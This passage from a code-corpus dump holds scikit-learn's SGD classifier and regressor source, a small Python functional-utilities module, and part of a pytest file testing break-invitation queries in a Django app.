for the 'constant', 'invscaling' or\r\n 'adaptive' schedules. The default value is 0.0 as eta0 is not used by\r\n the default schedule 'optimal'.\r\n\r\n power_t : double, default=0.5\r\n The exponent for inverse scaling learning rate [default 0.5].\r\n\r\n early_stopping : bool, default=False\r\n Whether to use early stopping to terminate training when validation\r\n score is not improving. If set to True, it will automatically set aside\r\n a stratified fraction of training data as validation and terminate\r\n training when validation score returned by the `score` method is not\r\n improving by at least tol for n_iter_no_change consecutive epochs.\r\n\r\n .. versionadded:: 0.20\r\n Added 'early_stopping' option\r\n\r\n validation_fraction : float, default=0.1\r\n The proportion of training data to set aside as validation set for\r\n early stopping. Must be between 0 and 1.\r\n Only used if `early_stopping` is True.\r\n\r\n .. versionadded:: 0.20\r\n Added 'validation_fraction' option\r\n\r\n n_iter_no_change : int, default=5\r\n Number of iterations with no improvement to wait before early stopping.\r\n\r\n .. versionadded:: 0.20\r\n Added 'n_iter_no_change' option\r\n\r\n class_weight : dict, {class_label: weight} or \"balanced\", default=None\r\n Preset for the class_weight fit parameter.\r\n\r\n Weights associated with classes. If not given, all classes\r\n are supposed to have weight one.\r\n\r\n The \"balanced\" mode uses the values of y to automatically adjust\r\n weights inversely proportional to class frequencies in the input data\r\n as ``n_samples / (n_classes * np.bincount(y))``.\r\n\r\n warm_start : bool, default=False\r\n When set to True, reuse the solution of the previous call to fit as\r\n initialization, otherwise, just erase the previous solution.\r\n See :term:`the Glossary `.\r\n\r\n Repeatedly calling fit or partial_fit when warm_start is True can\r\n result in a different solution than when calling fit a single time\r\n because of the way the data is shuffled.\r\n If a dynamic learning rate is used, the learning rate is adapted\r\n depending on the number of samples already seen. Calling ``fit`` resets\r\n this counter, while ``partial_fit`` will result in increasing the\r\n existing counter.\r\n\r\n average : bool or int, default=False\r\n When set to True, computes the averaged SGD weights accross all\r\n updates and stores the result in the ``coef_`` attribute. If set to\r\n an int greater than 1, averaging will begin once the total number of\r\n samples seen reaches `average`. So ``average=10`` will begin\r\n averaging after seeing 10 samples.\r\n\r\n Attributes\r\n ----------\r\n coef_ : ndarray of shape (1, n_features) if n_classes == 2 else \\\r\n (n_classes, n_features)\r\n Weights assigned to the features.\r\n\r\n intercept_ : ndarray of shape (1,) if n_classes == 2 else (n_classes,)\r\n Constants in decision function.\r\n\r\n n_iter_ : int\r\n The actual number of iterations before reaching the stopping criterion.\r\n For multiclass fits, it is the maximum over every binary fit.\r\n\r\n loss_function_ : concrete ``LossFunction``\r\n\r\n classes_ : array of shape (n_classes,)\r\n\r\n t_ : int\r\n Number of weight updates performed during training.\r\n Same as ``(n_iter_ * n_samples)``.\r\n\r\n See Also\r\n --------\r\n sklearn.svm.LinearSVC : Linear support vector classification.\r\n LogisticRegression : Logistic regression.\r\n Perceptron : Inherits from SGDClassifier. ``Perceptron()`` is equivalent to\r\n ``SGDClassifier(loss=\"perceptron\", eta0=1, learning_rate=\"constant\",\r\n penalty=None)``.\r\n\r\n Examples\r\n --------\r\n >>> import numpy as np\r\n >>> from sklearn.linear_model import SGDClassifier\r\n >>> from sklearn.preprocessing import StandardScaler\r\n >>> from sklearn.pipeline import make_pipeline\r\n >>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])\r\n >>> Y = np.array([1, 1, 2, 2])\r\n >>> # Always scale the input. The most convenient way is to use a pipeline.\r\n >>> clf = make_pipeline(StandardScaler(),\r\n ... SGDClassifier(max_iter=1000, tol=1e-3))\r\n >>> clf.fit(X, Y)\r\n Pipeline(steps=[('standardscaler', StandardScaler()),\r\n ('sgdclassifier', SGDClassifier())])\r\n >>> print(clf.predict([[-0.8, -1]]))\r\n [1]\r\n \"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"hinge\", *, penalty='l2', alpha=0.0001,\r\n l1_ratio=0.15,\r\n fit_intercept=True, max_iter=1000, tol=1e-3, shuffle=True,\r\n verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,\r\n random_state=None, learning_rate=\"optimal\", eta0=0.0,\r\n power_t=0.5, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, class_weight=None, warm_start=False,\r\n average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, class_weight=class_weight,\r\n warm_start=warm_start, average=average)\r\n\r\n def _check_proba(self):\r\n if self.loss not in (\"log\", \"modified_huber\"):\r\n raise AttributeError(\"probability estimates are not available for\"\r\n \" loss=%r\" % self.loss)\r\n\r\n @property\r\n def predict_proba(self):\r\n \"\"\"Probability estimates.\r\n\r\n This method is only available for log loss and modified Huber loss.\r\n\r\n Multiclass probability estimates are derived from binary (one-vs.-rest)\r\n estimates by simple normalization, as recommended by Zadrozny and\r\n Elkan.\r\n\r\n Binary probability estimates for loss=\"modified_huber\" are given by\r\n (clip(decision_function(X), -1, 1) + 1) / 2. For other loss functions\r\n it is necessary to perform proper probability calibration by wrapping\r\n the classifier with\r\n :class:`~sklearn.calibration.CalibratedClassifierCV` instead.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Input data for prediction.\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples, n_classes)\r\n Returns the probability of the sample for each class in the model,\r\n where classes are ordered as they are in `self.classes_`.\r\n\r\n References\r\n ----------\r\n Zadrozny and Elkan, \"Transforming classifier scores into multiclass\r\n probability estimates\", SIGKDD'02,\r\n http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf\r\n\r\n The justification for the formula in the loss=\"modified_huber\"\r\n case is in the appendix B in:\r\n http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf\r\n \"\"\"\r\n self._check_proba()\r\n return self._predict_proba\r\n\r\n def _predict_proba(self, X):\r\n check_is_fitted(self)\r\n\r\n if self.loss == \"log\":\r\n return self._predict_proba_lr(X)\r\n\r\n elif self.loss == \"modified_huber\":\r\n binary = (len(self.classes_) == 2)\r\n scores = self.decision_function(X)\r\n\r\n if binary:\r\n prob2 = np.ones((scores.shape[0], 2))\r\n prob = prob2[:, 1]\r\n else:\r\n prob = scores\r\n\r\n np.clip(scores, -1, 1, prob)\r\n prob += 1.\r\n prob /= 2.\r\n\r\n if binary:\r\n prob2[:, 0] -= prob\r\n prob = prob2\r\n else:\r\n # the above might assign zero to all classes, which doesn't\r\n # normalize neatly; work around this to produce uniform\r\n # probabilities\r\n prob_sum = prob.sum(axis=1)\r\n all_zero = (prob_sum == 0)\r\n if np.any(all_zero):\r\n prob[all_zero, :] = 1\r\n prob_sum[all_zero] = len(self.classes_)\r\n\r\n # normalize\r\n prob /= prob_sum.reshape((prob.shape[0], -1))\r\n\r\n return prob\r\n\r\n else:\r\n raise NotImplementedError(\"predict_(log_)proba only supported when\"\r\n \" loss='log' or loss='modified_huber' \"\r\n \"(%r given)\" % self.loss)\r\n\r\n @property\r\n def predict_log_proba(self):\r\n \"\"\"Log of probability estimates.\r\n\r\n This method is only available for log loss and modified Huber loss.\r\n\r\n When loss=\"modified_huber\", probability estimates may be hard zeros\r\n and ones, so taking the logarithm is not possible.\r\n\r\n See ``predict_proba`` for details.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix} of shape (n_samples, n_features)\r\n Input data for prediction.\r\n\r\n Returns\r\n -------\r\n T : array-like, shape (n_samples, n_classes)\r\n Returns the log-probability of the sample for each class in the\r\n model, where classes are ordered as they are in\r\n `self.classes_`.\r\n \"\"\"\r\n self._check_proba()\r\n return self._predict_log_proba\r\n\r\n def _predict_log_proba(self, X):\r\n return np.log(self.predict_proba(X))\r\n\r\n def _more_tags(self):\r\n return {\r\n '_xfail_checks': {\r\n 'check_sample_weights_invariance':\r\n 'zero sample_weight is not equivalent to removing samples',\r\n }\r\n }\r\n\r\n\r\nclass BaseSGDRegressor(RegressorMixin, BaseSGD):\r\n\r\n loss_functions = {\r\n \"squared_loss\": (SquaredLoss, ),\r\n \"huber\": (Huber, DEFAULT_EPSILON),\r\n \"epsilon_insensitive\": (EpsilonInsensitive, DEFAULT_EPSILON),\r\n \"squared_epsilon_insensitive\": (SquaredEpsilonInsensitive,\r\n DEFAULT_EPSILON),\r\n }\r\n\r\n @abstractmethod\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"squared_loss\", *, penalty=\"l2\", alpha=0.0001,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,\r\n random_state=None, learning_rate=\"invscaling\", eta0=0.01,\r\n power_t=0.25, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n\r\n def _partial_fit(self, X, y, alpha, C, loss, learning_rate,\r\n max_iter, sample_weight, coef_init, intercept_init):\r\n X, y = self._validate_data(X, y, accept_sparse=\"csr\", copy=False,\r\n order='C', dtype=np.float64,\r\n accept_large_sparse=False)\r\n y = y.astype(np.float64, copy=False)\r\n\r\n n_samples, n_features = X.shape\r\n\r\n sample_weight = _check_sample_weight(sample_weight, X)\r\n\r\n # Allocate datastructures from input arguments\r\n if getattr(self, \"coef_\", None) is None:\r\n self._allocate_parameter_mem(1, n_features, coef_init,\r\n intercept_init)\r\n elif n_features != self.coef_.shape[-1]:\r\n raise ValueError(\"Number of features %d does not match previous \"\r\n \"data %d.\" % (n_features, self.coef_.shape[-1]))\r\n if self.average > 0 and getattr(self, \"_average_coef\", None) is None:\r\n self._average_coef = np.zeros(n_features,\r\n dtype=np.float64,\r\n order=\"C\")\r\n self._average_intercept = np.zeros(1, dtype=np.float64, order=\"C\")\r\n\r\n self._fit_regressor(X, y, alpha, C, loss, learning_rate,\r\n sample_weight, max_iter)\r\n\r\n return self\r\n\r\n def partial_fit(self, X, y, sample_weight=None):\r\n \"\"\"Perform one epoch of stochastic gradient descent on given samples.\r\n\r\n Internally, this method uses ``max_iter = 1``. Therefore, it is not\r\n guaranteed that a minimum of the cost function is reached after calling\r\n it once. Matters such as objective convergence and early stopping\r\n should be handled by the user.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Subset of training data\r\n\r\n y : numpy array of shape (n_samples,)\r\n Subset of target values\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples.\r\n If not provided, uniform weights are assumed.\r\n\r\n Returns\r\n -------\r\n self : returns an instance of self.\r\n \"\"\"\r\n self._validate_params(for_partial_fit=True)\r\n return self._partial_fit(X, y, self.alpha, C=1.0,\r\n loss=self.loss,\r\n learning_rate=self.learning_rate, max_iter=1,\r\n sample_weight=sample_weight, coef_init=None,\r\n intercept_init=None)\r\n\r\n def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,\r\n intercept_init=None, sample_weight=None):\r\n self._validate_params()\r\n if self.warm_start and getattr(self, \"coef_\", None) is not None:\r\n if coef_init is None:\r\n coef_init = self.coef_\r\n if intercept_init is None:\r\n intercept_init = self.intercept_\r\n else:\r\n self.coef_ = None\r\n self.intercept_ = None\r\n\r\n # Clear iteration count for multiple call to fit.\r\n self.t_ = 1.0\r\n\r\n self._partial_fit(X, y, alpha, C, loss, learning_rate,\r\n self.max_iter, sample_weight, coef_init,\r\n intercept_init)\r\n\r\n if (self.tol is not None and self.tol > -np.inf\r\n and self.n_iter_ == self.max_iter):\r\n warnings.warn(\"Maximum number of iteration reached before \"\r\n \"convergence. Consider increasing max_iter to \"\r\n \"improve the fit.\",\r\n ConvergenceWarning)\r\n\r\n return self\r\n\r\n def fit(self, X, y, coef_init=None, intercept_init=None,\r\n sample_weight=None):\r\n \"\"\"Fit linear model with Stochastic Gradient Descent.\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n Training data\r\n\r\n y : ndarray of shape (n_samples,)\r\n Target values\r\n\r\n coef_init : ndarray of shape (n_features,), default=None\r\n The initial coefficients to warm-start the optimization.\r\n\r\n intercept_init : ndarray of shape (1,), default=None\r\n The initial intercept to warm-start the optimization.\r\n\r\n sample_weight : array-like, shape (n_samples,), default=None\r\n Weights applied to individual samples (1. for unweighted).\r\n\r\n Returns\r\n -------\r\n self : returns an instance of self.\r\n \"\"\"\r\n return self._fit(X, y, alpha=self.alpha, C=1.0,\r\n loss=self.loss, learning_rate=self.learning_rate,\r\n coef_init=coef_init,\r\n intercept_init=intercept_init,\r\n sample_weight=sample_weight)\r\n\r\n def _decision_function(self, X):\r\n \"\"\"Predict using the linear model\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples,)\r\n Predicted target values per element in X.\r\n \"\"\"\r\n check_is_fitted(self)\r\n\r\n X = check_array(X, accept_sparse='csr')\r\n\r\n scores = safe_sparse_dot(X, self.coef_.T,\r\n dense_output=True) + self.intercept_\r\n return scores.ravel()\r\n\r\n def predict(self, X):\r\n \"\"\"Predict using the linear model\r\n\r\n Parameters\r\n ----------\r\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\r\n\r\n Returns\r\n -------\r\n ndarray of shape (n_samples,)\r\n Predicted target values per element in X.\r\n \"\"\"\r\n return self._decision_function(X)\r\n\r\n def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,\r\n sample_weight, max_iter):\r\n dataset, intercept_decay = make_dataset(X, y, sample_weight)\r\n\r\n loss_function = self._get_loss_function(loss)\r\n penalty_type = self._get_penalty_type(self.penalty)\r\n learning_rate_type = self._get_learning_rate_type(learning_rate)\r\n\r\n if not hasattr(self, \"t_\"):\r\n self.t_ = 1.0\r\n\r\n validation_mask = self._make_validation_split(y)\r\n validation_score_cb = self._make_validation_score_cb(\r\n validation_mask, X, y, sample_weight)\r\n\r\n random_state = check_random_state(self.random_state)\r\n # numpy mtrand expects a C long which is a signed 32 bit integer under\r\n # Windows\r\n seed = random_state.randint(0, np.iinfo(np.int32).max)\r\n\r\n tol = self.tol if self.tol is not None else -np.inf\r\n\r\n if self.average:\r\n coef = self._standard_coef\r\n intercept = self._standard_intercept\r\n average_coef = self._average_coef\r\n average_intercept = self._average_intercept\r\n else:\r\n coef = self.coef_\r\n intercept = self.intercept_\r\n average_coef = None # Not used\r\n average_intercept = [0] # Not used\r\n\r\n coef, intercept, average_coef, average_intercept, self.n_iter_ = \\\r\n _plain_sgd(coef,\r\n intercept[0],\r\n average_coef,\r\n average_intercept[0],\r\n loss_function,\r\n penalty_type,\r\n alpha, C,\r\n self.l1_ratio,\r\n dataset,\r\n validation_mask, self.early_stopping,\r\n validation_score_cb,\r\n int(self.n_iter_no_change),\r\n max_iter, tol,\r\n int(self.fit_intercept),\r\n int(self.verbose),\r\n int(self.shuffle),\r\n seed,\r\n 1.0, 1.0,\r\n learning_rate_type,\r\n self.eta0, self.power_t, self.t_,\r\n intercept_decay, self.average)\r\n\r\n self.t_ += self.n_iter_ * X.shape[0]\r\n\r\n if self.average > 0:\r\n self._average_intercept = np.atleast_1d(average_intercept)\r\n self._standard_intercept = np.atleast_1d(intercept)\r\n\r\n if self.average <= self.t_ - 1.0:\r\n # made enough updates for averaging to be taken into account\r\n self.coef_ = average_coef\r\n self.intercept_ = np.atleast_1d(average_intercept)\r\n else:\r\n self.coef_ = coef\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n else:\r\n self.intercept_ = np.atleast_1d(intercept)\r\n\r\n\r\nclass SGDRegressor(BaseSGDRegressor):\r\n \"\"\"Linear model fitted by minimizing a regularized empirical loss with SGD\r\n\r\n SGD stands for Stochastic Gradient Descent: the gradient of the loss is\r\n estimated each sample at a time and the model is updated along the way with\r\n a decreasing strength schedule (aka learning rate).\r\n\r\n The regularizer is a penalty added to the loss function that shrinks model\r\n parameters towards the zero vector using either the squared euclidean norm\r\n L2 or the absolute norm L1 or a combination of both (Elastic Net). If the\r\n parameter update crosses the 0.0 value because of the regularizer, the\r\n update is truncated to 0.0 to allow for learning sparse models and achieve\r\n online feature selection.\r\n\r\n This implementation works with data represented as dense numpy arrays of\r\n floating point values for the features.\r\n\r\n Read more in the :ref:`User Guide `.\r\n\r\n Parameters\r\n ----------\r\n loss : str, default='squared_loss'\r\n The loss function to be used. The possible values are 'squared_loss',\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'\r\n\r\n The 'squared_loss' refers to the ordinary least squares fit.\r\n 'huber' modifies 'squared_loss' to focus less on getting outliers\r\n correct by switching from squared to linear loss past a distance of\r\n epsilon. 'epsilon_insensitive' ignores errors less than epsilon and is\r\n linear past that; this is the loss function used in SVR.\r\n 'squared_epsilon_insensitive' is the same but becomes squared loss past\r\n a tolerance of epsilon.\r\n\r\n More details about the losses formulas can be found in the\r\n :ref:`User Guide `.\r\n\r\n penalty : {'l2', 'l1', 'elasticnet'}, default='l2'\r\n The penalty (aka regularization term) to be used. Defaults to 'l2'\r\n which is the standard regularizer for linear SVM models. 'l1' and\r\n 'elasticnet' might bring sparsity to the model (feature selection)\r\n not achievable with 'l2'.\r\n\r\n alpha : float, default=0.0001\r\n Constant that multiplies the regularization term. The higher the\r\n value, the stronger the regularization.\r\n Also used to compute the learning rate when set to `learning_rate` is\r\n set to 'optimal'.\r\n\r\n l1_ratio : float, default=0.15\r\n The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.\r\n l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.\r\n Only used if `penalty` is 'elasticnet'.\r\n\r\n fit_intercept : bool, default=True\r\n Whether the intercept should be estimated or not. If False, the\r\n data is assumed to be already centered.\r\n\r\n max_iter : int, default=1000\r\n The maximum number of passes over the training data (aka epochs).\r\n It only impacts the behavior in the ``fit`` method, and not the\r\n :meth:`partial_fit` method.\r\n\r\n .. versionadded:: 0.19\r\n\r\n tol : float, default=1e-3\r\n The stopping criterion. If it is not None, training will stop\r\n when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive\r\n epochs.\r\n\r\n .. versionadded:: 0.19\r\n\r\n shuffle : bool, default=True\r\n Whether or not the training data should be shuffled after each epoch.\r\n\r\n verbose : int, default=0\r\n The verbosity level.\r\n\r\n epsilon : float, default=0.1\r\n Epsilon in the epsilon-insensitive loss functions; only if `loss` is\r\n 'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.\r\n For 'huber', determines the threshold at which it becomes less\r\n important to get the prediction exactly right.\r\n For epsilon-insensitive, any differences between the current prediction\r\n and the correct label are ignored if they are less than this threshold.\r\n\r\n random_state : int, RandomState instance, default=None\r\n Used for shuffling the data, when ``shuffle`` is set to ``True``.\r\n Pass an int for reproducible output across multiple function calls.\r\n See :term:`Glossary `.\r\n\r\n learning_rate : string, default='invscaling'\r\n The learning rate schedule:\r\n\r\n - 'constant': `eta = eta0`\r\n - 'optimal': `eta = 1.0 / (alpha * (t + t0))`\r\n where t0 is chosen by a heuristic proposed by Leon Bottou.\r\n - 'invscaling': `eta = eta0 / pow(t, power_t)`\r\n - 'adaptive': eta = eta0, as long as the training keeps decreasing.\r\n Each time n_iter_no_change consecutive epochs fail to decrease the\r\n training loss by tol or fail to increase validation score by tol if\r\n early_stopping is True, the current learning rate is divided by 5.\r\n\r\n .. versionadded:: 0.20\r\n Added 'adaptive' option\r\n\r\n eta0 : double, default=0.01\r\n The initial learning rate for the 'constant', 'invscaling' or\r\n 'adaptive' schedules. The default value is 0.01.\r\n\r\n power_t : double, default=0.25\r\n The exponent for inverse scaling learning rate.\r\n\r\n early_stopping : bool, default=False\r\n Whether to use early stopping to terminate training when validation\r\n score is not improving. If set to True, it will automatically set aside\r\n a fraction of training data as validation and terminate\r\n training when validation score returned by the `score` method is not\r\n improving by at least `tol` for `n_iter_no_change` consecutive\r\n epochs.\r\n\r\n .. versionadded:: 0.20\r\n Added 'early_stopping' option\r\n\r\n validation_fraction : float, default=0.1\r\n The proportion of training data to set aside as validation set for\r\n early stopping. Must be between 0 and 1.\r\n Only used if `early_stopping` is True.\r\n\r\n .. versionadded:: 0.20\r\n Added 'validation_fraction' option\r\n\r\n n_iter_no_change : int, default=5\r\n Number of iterations with no improvement to wait before early stopping.\r\n\r\n .. versionadded:: 0.20\r\n Added 'n_iter_no_change' option\r\n\r\n warm_start : bool, default=False\r\n When set to True, reuse the solution of the previous call to fit as\r\n initialization, otherwise, just erase the previous solution.\r\n See :term:`the Glossary `.\r\n\r\n Repeatedly calling fit or partial_fit when warm_start is True can\r\n result in a different solution than when calling fit a single time\r\n because of the way the data is shuffled.\r\n If a dynamic learning rate is used, the learning rate is adapted\r\n depending on the number of samples already seen. Calling ``fit`` resets\r\n this counter, while ``partial_fit`` will result in increasing the\r\n existing counter.\r\n\r\n average : bool or int, default=False\r\n When set to True, computes the averaged SGD weights accross all\r\n updates and stores the result in the ``coef_`` attribute. If set to\r\n an int greater than 1, averaging will begin once the total number of\r\n samples seen reaches `average`. So ``average=10`` will begin\r\n averaging after seeing 10 samples.\r\n\r\n Attributes\r\n ----------\r\n coef_ : ndarray of shape (n_features,)\r\n Weights assigned to the features.\r\n\r\n intercept_ : ndarray of shape (1,)\r\n The intercept term.\r\n\r\n average_coef_ : ndarray of shape (n_features,)\r\n Averaged weights assigned to the features. Only available\r\n if ``average=True``.\r\n\r\n .. deprecated:: 0.23\r\n Attribute ``average_coef_`` was deprecated\r\n in version 0.23 and will be removed in 1.0 (renaming of 0.25).\r\n\r\n average_intercept_ : ndarray of shape (1,)\r\n The averaged intercept term. Only available if ``average=True``.\r\n\r\n .. deprecated:: 0.23\r\n Attribute ``average_intercept_`` was deprecated\r\n in version 0.23 and will be removed in 1.0 (renaming of 0.25).\r\n\r\n n_iter_ : int\r\n The actual number of iterations before reaching the stopping criterion.\r\n\r\n t_ : int\r\n Number of weight updates performed during training.\r\n Same as ``(n_iter_ * n_samples)``.\r\n\r\n Examples\r\n --------\r\n >>> import numpy as np\r\n >>> from sklearn.linear_model import SGDRegressor\r\n >>> from sklearn.pipeline import make_pipeline\r\n >>> from sklearn.preprocessing import StandardScaler\r\n >>> n_samples, n_features = 10, 5\r\n >>> rng = np.random.RandomState(0)\r\n >>> y = rng.randn(n_samples)\r\n >>> X = rng.randn(n_samples, n_features)\r\n >>> # Always scale the input. The most convenient way is to use a pipeline.\r\n >>> reg = make_pipeline(StandardScaler(),\r\n ... SGDRegressor(max_iter=1000, tol=1e-3))\r\n >>> reg.fit(X, y)\r\n Pipeline(steps=[('standardscaler', StandardScaler()),\r\n ('sgdregressor', SGDRegressor())])\r\n\r\n See Also\r\n --------\r\n Ridge, ElasticNet, Lasso, sklearn.svm.SVR\r\n\r\n \"\"\"\r\n @_deprecate_positional_args\r\n def __init__(self, loss=\"squared_loss\", *, penalty=\"l2\", alpha=0.0001,\r\n l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,\r\n shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,\r\n random_state=None, learning_rate=\"invscaling\", eta0=0.01,\r\n power_t=0.25, early_stopping=False, validation_fraction=0.1,\r\n n_iter_no_change=5, warm_start=False, average=False):\r\n super().__init__(\r\n loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,\r\n fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,\r\n shuffle=shuffle, verbose=verbose, epsilon=epsilon,\r\n random_state=random_state, learning_rate=learning_rate, eta0=eta0,\r\n power_t=power_t, early_stopping=early_stopping,\r\n validation_fraction=validation_fraction,\r\n n_iter_no_change=n_iter_no_change, warm_start=warm_start,\r\n average=average)\r\n\r\n def _more_tags(self):\r\n return {\r\n '_xfail_checks': {\r\n 'check_sample_weights_invariance':\r\n 'zero sample_weight is not equivalent to removing samples',\r\n }\r\n }\r\n"} {"ext": "py", "sha": "1a2ea4a95b867ca5afe641e37e6aa7e734f024ea", "content": "\"\"\"\nCompai core functions\n\"\"\"\n\n\nfrom functools import partial, reduce, wraps\nfrom operator import itemgetter\nfrom typing import Callable, List, TypeVar\n\nT = TypeVar('T')\n\n\ndef compose(*F: List[Callable]):\n \"\"\"Compose the list of functions in F from right to left\n\n Arguments:\n F: List of functions\n\n Examples:\n ```pycon\n >>> compose(lambda x: x + 1, lambda x: x * 2)(5)\n 11\n >>>\n ```\n \"\"\"\n return reduce(lambda f, g: lambda x: f(g(x)), F)\n\n\ndef fmap(f):\n return partial(map, f)\n\n\ndef ffilter(f):\n return partial(filter, f)\n\n\ndef none_map(func, if_none=None):\n \"\"\"Returns a function that will call func if the argument is not none, and return if_none otherwise.\n\n Examples:\n ```pycon\n >>> f = none_map(str, if_none=const(1))\n >>> f(1)\n '1'\n >>> f(None)\n 1\n >>>\n ```\n \"\"\"\n\n @wraps(func)\n def _func(x):\n if x is not None:\n return func(x)\n\n return if_none()\n\n return _func\n\n\ndef tupled(func):\n \"\"\"Returns a tupled version of the function.\n\n Examples:\n ```pycon\n >>> tupled(lambda a, b: a + b)((2, 3))\n 5\n >>>\n ```\n \"\"\"\n\n @wraps(func)\n def _func(x):\n return func(*x)\n\n return _func\n\n\ndef tuple_map(*fs):\n \"\"\"Returns a function that will apply every f_i for evey element of the tuple argument.\n\n Examples:\n ```pycon\n >>> inc = lambda x: x + 1\n >>> tuple_map(None, inc)((1, 2))\n (1, 3)\n >>> tuple_map(inc)((1, 2))\n (2, 2)\n >>>\n ```\n \"\"\"\n\n return compose(\n tuple,\n fmap(\n tupled(lambda i, v: fs[i](v) if i < len(fs) and fs[i] else v),\n ),\n enumerate,\n )\n\n\ndef dict_map(**fs):\n \"\"\"Map especific elements in a dict.\n\n Examples:\n ```pycon\n >>> dict_map(a=int, b=str)(dict(a='1', b=123, c=True))\n {'a': 1, 'b': '123', 'c': True}\n >>>\n ```\n \"\"\"\n\n def _change_dict(d):\n d = d.copy()\n\n for k, f in fs.items():\n if k in d:\n d[k] = f(d[k])\n\n return d\n\n return _change_dict\n\n\ndef identity(x):\n return x\n\n\ndef apply(f, *args):\n return f(*args)\n\n\ndef const(x: T) -> Callable[..., T]:\n \"\"\"Returns a function that will always return `x`.\n\n Arguments:\n x: Any value\n\n Examples:\n ```pycon\n >>> f = const('foo')\n >>> f()\n 'foo'\n >>> f(1, a='brr')\n 'foo'\n >>>\n ```\n \"\"\"\n\n return lambda *_, **__: x\n\n\ndef length(xs):\n \"\"\"Returns the length of xs.\n\n Examples:\n ```pycon\n >>> length([1, 2, 3])\n 3\n >>> length(range(10))\n 10\n >>> length(None for _ in range(10))\n 10\n >>>\n ```\n \"\"\"\n\n len_ = getattr(xs, '__len__', None)\n\n def default_len():\n return sum(1 for _ in xs)\n\n return compose(\n apply,\n none_map(identity, if_none=const(default_len))\n )(len_)\n\n\ndef swap(x):\n return itemgetter(1, 0)(x)\n"} {"ext": "py", "sha": "1a2ea62077698c22303df4b8b2247d3b05a6f55f", "content": "from datetime import datetime, timedelta\n\nimport pytest\nimport pytz\n\nfrom kaffepause.breaks.selectors import get_pending_break_invitations\nfrom kaffepause.breaks.test.factories import BreakFactory, BreakInvitationFactory\n\npytestmark = pytest.mark.django_db\n\n\ndef test_get_break_invitations_awaiting_reply_returns_unanswered_invitations(user):\n \"\"\"Should return all non-expired break invitations the user has not replied to.\"\"\"\n unanswered_break_invitation = BreakInvitationFactory()\n unanswered_break_invitation.subject.connect(BreakFactory())\n unanswered_break_invitation.addressees.connect(user)\n\n an_hour_ago = datetime.now(pytz.utc) - timedelta(hours=10)\n expired_break = BreakFactory()\n expired_break.starting_at = an_hour_ago\n expired_break.save()\n expired_break_invitation = BreakInvitationFactory()\n expired_break_invitation.subject.connect(expired_break)\n expired_break_invitation.addressees.connect(user)\n\n accepted_break_invitation = BreakInvitationFactory()\n accepted_break_invitation.subject.connect(BreakFactory())\n accepted_break_invitation.addressees.connect(user)\n accepted_break_invitation.acceptees.connect(user)\n\n declined_break_invitation = BreakInvitationFactory()\n declined_break_invitation.subject.connect(BreakFactory())\n declined_break_invitation.addressees.connect(user)\n declined_break_invitation.declinees.connect(user)\n\n actual_break_invitations = get_pending_break_invitations(actor=user)\n\n assert unanswered_break_invitation in actual_break_invitations\n assert expired_break_invitation not in actual_break_invitations\n assert accepted_break_invitation not in actual_break_invitations\n assert declined_break_invitation not in actual_break_invitations\n\n\ndef test_get_break_invitations_awaiting_reply_returns_unanswered_invitations_expired_five_minutes_ago(\n user,\n):\n \"\"\"Should return unanswered invitations who's break has started within 5 minutes ago.\"\"\"\n two_minutes_ago = datetime.now(pytz.utc) - timedelta(minutes=2)\n non_expired_break = BreakFactory()\n non_expired_break.starting_at = two_minutes_ago\n non_expired_break.save()\n non_expired_break_invitation = BreakInvitationFactory()\n non_expired_break_invitation.subject.connect(non_expired_break)\n non_expired_break_invitation.addressees.connect(user)\n\n ten_minutes_ago = datetime.now(pytz.utc) - timedelta(minutes=10)\n expired_break = BreakFactory()\n expired_break.starting_at = ten_minutes_ago\n expired_break.save()\n expired_break_invitation = BreakInvitationFactory()\n 